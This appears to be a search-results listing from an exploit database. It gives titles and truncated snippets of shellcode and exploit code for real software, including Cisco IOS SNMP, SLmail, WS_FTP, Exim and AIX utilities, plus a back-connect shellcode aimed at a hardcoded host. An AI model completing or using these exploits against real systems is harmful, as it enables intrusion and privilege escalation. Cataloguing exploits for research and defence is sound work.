47 matches found
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...
Cisco IOS - Remote Code Execution Exploit
Exploit for hardware platform in category remote exploits !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code exe...
Linux/x86-64 - Add root user with password - 390 bytes
No description provided by source. / Title: Linux/x86-64 - Add root user with password - 390 bytes Date: 2010-06-20 Tested: Archlinux x8664 k2.6.33 Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/shellstorm ! Database of shellcodes http://www.shell-storm.org/shellcode/ Add...
OpenBSD ftp Exploit (teso)
No description provided by source. / 7350-crocodile - x86/OpenBSD ftp exploit by lorian and scut / TESO=20 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be...
linux/x86 SET_PORT() portbind 100 bytes
Exploit for linux/x86 platform in category shellcode ======================================= linux/x86 SETPORT portbind 100 bytes ======================================= /--------------------------------------------------------------------------- 100 byte Portbind shellcode by Benjamin Orozco -...
Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit
No description provided by source. / gexp-powerd.c Power Daemon v2.0.2 Remote Format String Exploit Copyright C 2005 Gotfault Security Bug found and developed by: barros and xgc Original Reference: http://gotfault.net/research/exploit/gexp-powerd.c / include getopt.h include sys/types.h include...
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes. Shellcode exploit for netbsd/x86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL); note: unsafe shellcode, but 29 bytes long; doesn't work if eax & 0x40000000 != 0; / includ...
AIX 5.2 - 'netpmon' Local Privilege Escalation
/ IBM AIX netpmon elevated privileges exploit I just wanted to play with PowerPC Tested on 5.2 intropy intropy caughq.org / include include include include define DEBUG 1 define BUFFERSIZE 2048 define EGGSIZE 2048 define NOP 0x60 define ADDRESS 0x2ff22fff-BUFFERSIZE/2 char shellcodebinsh =...
MS Internet Explorer "mshtml.dll" CSS Parsing Buffer Overflow
No description provided by source. / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. /...
Typespeed 0.4.1 - Local Format String
// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful exploitation could allow privilege escalation. / Proof of Concept local exploit for typespeed tool "enva" content: include include int mainint argc, char argv char addrptr = NULL;...
Setuid perl PerlIO_Debug() overflow
Exploit for linux platform in category local exploits =================================== Setuid perl PerlIODebug overflow =================================== / Copyright Kevin Finisterre Setuid perl PerlIODebug overflow Tested on Debian 3.1 perl-suid 5.8.4-5 11:07:20 corezion: who is tha man wit...
Exim <= 4.41 dns_build_reverse Local Exploit PoC
Exploit for linux platform in category local exploits ================================================ Exim int main int argc, char argv static char shellcode= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"...
Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)
Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode =...
AIX 5.1 < 5.3 - paginit Local Stack Overflow
/ exploit for /usr/bin/paginit tested on: AIX 5.2 if the exploit fails it's because the shellcode ends up at a different address. use dbx to check, and change RETADDR accordingly. cees-bart / define RETADDR 0x2ff22c90 char shellcode = "\x7c\xa5\x2a\x79" "\x40\x82\xff\xfd" "\x7c\xa8\x02\xa6"...
Aspell (word-list-compress) Command Line Stack Overflow
Exploit for linux platform in category local exploits ======================================================= Aspell word-list-compress Command Line Stack Overflow ======================================================= / Fuck private exploits . Fuck iranian hacking and security !! teams who are...
WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit
No description provided by source. / no@0x00:/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test Ipswitch WSFTP Remote buffer overflow exploit by NoPh0BiA. x Connected to: 10.20.30.2 on port 21. x Sending Login..done. x Sending bad code..done. x Checking if exploitation was successful.. ...
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
Mercury Mail 4.01 Pegasus IMAP Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanilla stack overflow in the SELECT command import struct import socket from time import sleep s = socket.socketsocket.AFINET, socket.SOCKSTREAM Lame calc.exe shellcode - dont expect...
stackShell.txt
hi, im posting here a manner for avoiding stackguard. Shellcode without zeros. // /Shellcode avoiding stack protections sample--------Vallez/29a/ // / All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let...
bsd/x86 connect 93 bytes
Exploit for bsd/x86 platform in category shellcode ======================== bsd/x86 connect 93 bytes ======================== / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id...